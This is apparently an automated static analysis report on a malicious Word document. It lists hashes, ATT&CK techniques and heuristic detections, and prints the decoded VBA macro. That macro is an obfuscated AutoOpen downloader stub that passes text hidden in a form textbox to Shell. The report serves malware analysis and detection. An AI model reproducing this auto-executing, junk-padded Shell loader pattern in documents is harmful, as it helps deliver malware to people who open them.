Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 abf52bb66da28da3…

MALICIOUS

Office (OLE)

Size: 134.1 KB
Created: 2018-12-20 11:53:00
Authoring application: Microsoft Office Word
First seen: 2019-01-25
MD5: eebc807589e38fc9299abe8bb268b57d
SHA-1: 3cd09f880a0f9ed86186f89c45f9a6f10b7589d2
SHA-256: abf52bb66da28da3ec30e56875cb59fe40d710982854806ca0580c2e7d55a7f0
Risk score: 250

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro calls the Shell() function, a common technique for executing arbitrary commands, which strongly suggests that the document's purpose is to download and execute a secondary payload, consistent with downloader malware. The presence of an AutoOpen macro further indicates that the command is intended to run immediately when the document is opened.

Heuristics 8

  • ClamAV: Doc.Downloader.Generic-6790263-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6790263-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
          End Select
    I40884611 = Array(s9003973, U510782, C0061948, Interaction.Shell(CVar("" + Z59460 + s9729725 + q26502851691.TextBox1) + G53079 + J9519181 + F99162 + r014463 + t0690959, 84 - 84), q946225)
       Select Case j44199741581453
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
    Sub autoopen()
    J45644
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4494 bytes
SHA-256: 722024b0979af1b6d16d326b192f849e0a217293f99c058561b07c6090b97d48
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "q26502851691"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
J45644
End Sub

Attribute VB_Name = "U6968476"
Function J45644()
On Error Resume Next
   Select Case N234587647529653
         Case 140571356
         h183 = r7151
            W425 = CInt(j4076 / CByte(O5932))
            L7260 = s4512
         Case 148719039
         W3729 = P730
         N850 = R4880
           t9056 = CInt(D262 / CByte(z2573))
         Case 325752404
         r1071 = L397
         j589 = S8359
      End Select
I40884611 = Array(s9003973, U510782, C0061948, Interaction.Shell(CVar("" + Z59460 + s9729725 + q26502851691.TextBox1) + G53079 + J9519181 + F99162 + r014463 + t0690959, 84 - 84), q946225)
   Select Case j44199741581453
         Case 152570396
         j2849 = n3031
            X506 = CInt(E830 / CByte(L281))
            J4852 = N1257
         Case 253167961
         f8077 = f095
         Q536 = w668
           d9289 = CInt(K591 / CByte(S2733))
         Case 186377470
         j5049 = E7687
         u109 = t999
      End Select
   Select Case T84649020058929
         Case 143811214
         I5091 = c502
            h721 = CInt(j628 / CByte(Q1619))
            C2524 = s952
         Case 77176072
         d814 = z6395
         F7778 = X4837
           P5073 = CInt(O6253 / CByte(w9047))
         Case 177051334
         l7746 = l1108
         D938 = q3356
      End Select
   Select Case u789739483091124473
         Case 195264219
         Q824 = h900
            E400 = CInt(q3760 / CByte(i037))
            z630 = v996
         Case 307226189
         a7614 = P9611
         Z217 = J8997
           j3717 = CInt(Y141 / CByte(m019))
         Case 310984946
         h5149 = o843
         k918 = v9988
      End Select
   Select Case z84316110784124064680129
         Case 127800220
         l385 = Y112
            w3164 = CInt(Y0151 / CByte(l041))
            v9065 = k9845
         Case 173019800
         Q017 = N3141
         K9033 = r2192
           L255 = CInt(k761 / CByte(n225))
         Case 23737472
         F9769 = S705
         M5455 = l965
      End Select
End Function


Attribute VB_Name = "z7245179"

Attribute VB_Name = "K57589934034615"

Attribute VB_Name = "H1211804"

Attribute VB_Name = "Z436459942"

Attribute VB_Name = "w9538962"

Attribute VB_Name = "z6919277166"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "F40072286114691"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "E2794164077656"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "b2407508845"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "P4763648184477"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "L1679177327"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False